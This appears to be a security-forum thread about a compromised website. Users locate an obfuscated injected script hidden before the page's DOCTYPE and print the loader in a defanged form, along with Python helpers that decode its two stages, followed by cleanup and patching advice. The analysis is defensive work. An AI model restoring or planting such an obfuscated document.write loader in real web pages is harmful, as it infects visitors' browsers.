Could someone please check if this website www.banipepost.com has been infected by the HTML:Iframe-inf?
If so, how can it be removed from the website and prevent future problems.
thanks
Well, I’m starting to analyze it, but this helps us believe that it is hosting malicious software…
This script outside (above) the starting html tag looks a bit suspicious. See image attached.
If so, how can it be removed from the website and prevent future problems.
Are you the owner of the website?
If not, I don’t think YOU can do anything, really, other than to notify the webmaster or owner of the site. But if you own the website, you can remove that script.
Then, I would make sure that all of your software is up to date, strengthen / change your passwords, or talk to your host about making sure that PHP, SQL, MYSQL, or whatever else that your site uses is up to date.
I have just visited the page and no alert by avast, perhaps it has been cleaned up.
Actually, there was never an alert from avast from my computer, only google chrome’s alert that I have posted in the first response to the O/P’s question.
Then, when I saw the code outside of the frame, I posted that. However, the code is still there.
The only problem is that I don’t have any way to search through the code to find out what it’s doing.
Again though, other than google chrome’s warning, I don’t know if it’s malicious or not…
I just checked the page source and it isn’t displaying the script tag before the <!DOCTYPE html PUBLIC.
However, there is a blank line above that, which is unusual, so perhaps they have removed it, which has left the blank line.
Ah sneaky, I have just scrolled a huge way to the right and now I see the obfuscated script, very sneaky.
sneaky sneaky sir.
To those who didn’t get that quote, it came from Mr. Deeds…
My sad attempt at humor, ;D.
I sent it to avast for further investigation though.
Hi
This is where you two are pointing at:
/////////////////////////^///////<script language=j*vascript>bleyyipoq="SOnHPUzp%V!O&mkiO&s";bxtapz="^sc!72i!70t l!61n!67ua!67e!3djavas!63r!69p!74!3e !20!66un!63t!69!6f!6e j!6dbdv!70!6bg!75(!6d!68!66bbw)!7bva!72!20!75mo!6f!72!73!70!2clxooo!6bg=\"M3)!2a!7e+'}!21p7!28^|#-B0Eoi,zFJ!6c9`{Z!66_!20!48th:!4by=!32!40!41I!75c1G!62!6eT!50!43!76!5bg!774!5c\"OV!5d.;x!36!24!73N!6d!64!61!72!26!55ke!71!385j\",nb!77fwgs!78!3d^\"\",n!6e!75!75hc!70,q!64!6cis!74!75q!68,!66!73pv!66!72!73=!22!22,!6e!79d!6cirz!3bfo!72!28u!6d!6f!6f!72s!70!3d!30!3bum!6for!73!70!3cm!68fbbw!2ele!6e!67!74!68;!75moo!72sp!2b!2b!29!7b n!6euuh!63!70!3dmhfb!62!77.!63!68!61rAt(!75moo!72s!70!29!3bqdli!73tu!71h=lxo!6f!6fkg.i!6ed!65!78Of!28nn!75!75!68!63p);if(!71!64lis!74!75qh>!2d1)!7b !6e!79d!6c!69rz=((!71!64l!69s!74!75!71h!2b1)!2581-!31!29;i!66(n!79!64lir!7a<!3d0)nyd!6ci!72z+=81;fs!70!76!66r!73!2b!3dlx!6f!6f!6fkg.char!41t!28!6eyd!6cir!7a!2d!31!29; } !65!6c!73e fsp!76!66rs+!3d!6e!6euuh!63p!3b!7dnbw!66!77!67sx!2b!3d!66spvfrs;!64!6fcume!6et.wr!69te(!6ebw!66!77gsx)!3b!7d!3c!2fscri!70!74>";vogazldrg=bleyyipoq.ch*rAt(8);abohqiefq=bxtapz.repl@ce(/!/g,vogazldrg);qjsgefm=unesc@pe(abohqiefq);var crkexpiq,rpngwnfh;document.write(qjsgefm);crkexpiq="<N1&,7hH9rTwcrwq2Olr[rS1&,7hO>H_cT1h,iTHh,:184Nr1c:N^*HZHh&=HZH[r&H1_&8,dn7&1TMw2HONn=:n894e=OzH4:e7:8,,78M_H2HGxH_cT1h,iTHw8r1hwcMi^TrdqzH[r9cq*HZ[r&HaH2HTq4HDrhqxa;NqhP,dq^^Tq4HDrhq*;wqhP,dq^*H'H5$\"EEEEE*xai1cdqTh;1iie,qH2HTrdqH'HO2OH'HqN1r7q^[r9cq*H'HOxHq67,&qN2OH'Ha;.................................(E$5\"GUO'ai1cdqTh;&q_q&&q&'OUO'Sh&,Tw^^Tq4HDrhq^**;wqhP,dq^**'O\\O><\\/SvRO'OuCP>OH*xHw8r1hwcMi^H1_&8,dn7&1TMwzH4:e7:8,,78M_H*xH!Hq9NqHZH!H!H1rh1:H^q*HZ!H!Hh,:184Nr1c:N^*x</N1&,7h>H";jmbdvpkgu(crkexpiq);^^//////</script>
//////////////////////////////////////////////////////////////////////////
Made the script unworkable, so it cannot run, but indeed it is quite some work of injected art?
Finjan SecureBrowsing has analyzed the above web address as it currently exists on the web.
The analysis indicates that:
Potentially malicious behavior was detected on this page
Technical information:
-Code Obfuscation (Home-Encoding),
polonus
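The pasted script works in two stages: a first stage that rebuilds a hidden <script> by swapping a marker character for "%" and calling unescape(), and a second stage (the jmbdvpkgu function) that maps every character of a payload through a key alphabet, one position to the left, before document.write() runs it. The helpers below, an added analysis example and not code from this thread or from any tool named in it, mirror both stages for offline inspection and also flag script blocks that sit before the DOCTYPE, as posters above noticed. The key and the sample inputs are constructed, and the stage-two decoder generalises the thread's hard-coded 81 to the key length.

```python
import re
from urllib.parse import unquote

# Constructed samples, not taken from the infected page.
SAMPLE_PAGE = ('<script>document.write("x")</script>\n'
               '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">'
               '<html><head><script src="site.js"></script></head></html>')
SAMPLE_STAGE1 = '!3cdiv!3ehello!3c/div!3e'     # marker '!' stands in for '%'
SAMPLE_KEY = 'abcdefghijklmnopqrstuvwxyz<>/'  # constructed 29-char alphabet
SAMPLE_STAGE2 = '>jgsbnf/'                    # decodes to "<iframe>" with SAMPLE_KEY


def scripts_before_doctype(html: str) -> list[str]:
    """Return <script> blocks that appear before <!DOCTYPE or <html>.
    A clean page has nothing but whitespace there, so any hit is worth a look."""
    m = re.search(r'<!DOCTYPE|<html', html, re.IGNORECASE)
    head = html if m is None else html[:m.start()]
    return re.findall(r'<script\b.*?</script>', head, re.IGNORECASE | re.DOTALL)


def stage1_decode(encoded: str, marker: str = '!') -> str:
    """Mirror of bxtapz.replace(/!/g, '%') followed by unescape().
    In the thread the '%' is itself pulled out of a cover string with charAt(8).
    unquote() covers the %XX escapes used here; JS unescape() also accepts %uXXXX."""
    return unquote(encoded.replace(marker, '%'))


def stage2_decode(payload: str, key: str) -> str:
    """Mirror of jmbdvpkgu(): every character found in the key is replaced by the
    key character one position to its left, wrapping at the ends; characters not
    in the key pass through unchanged. The original computes
    ((idx+1) % 81) - 1 with a fix-up for <= 0, which is just (idx - 1) mod 81."""
    out = []
    for ch in payload:
        idx = key.find(ch)
        out.append(ch if idx == -1 else key[(idx - 1) % len(key)])
    return ''.join(out)


def analyse(html: str) -> dict:
    """Summarise what an analyst wants to know: is anything injected above the
    DOCTYPE, and does it use the unescape()/document.write() pattern?"""
    found = scripts_before_doctype(html)
    return {
        'scripts_before_doctype': len(found),
        'uses_document_write': any('document.write' in s for s in found),
    }
```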
Thank you very much, I appreciate it. I wonder how they were able to inject that script?!?!
I removed it now, but I have to find a way to prevent this from happening in the future.
Commonly it is old versions of content management software, e.g. PHP, SQL, WordPress, etc. which are vulnerable to exploit.
So you need to ensure that if you are using something like this, it is the latest version; you may have to speak to your Host (no bad thing anyway) if they provide this functionality. Change all your passwords for FTP, any content control panel operations, etc.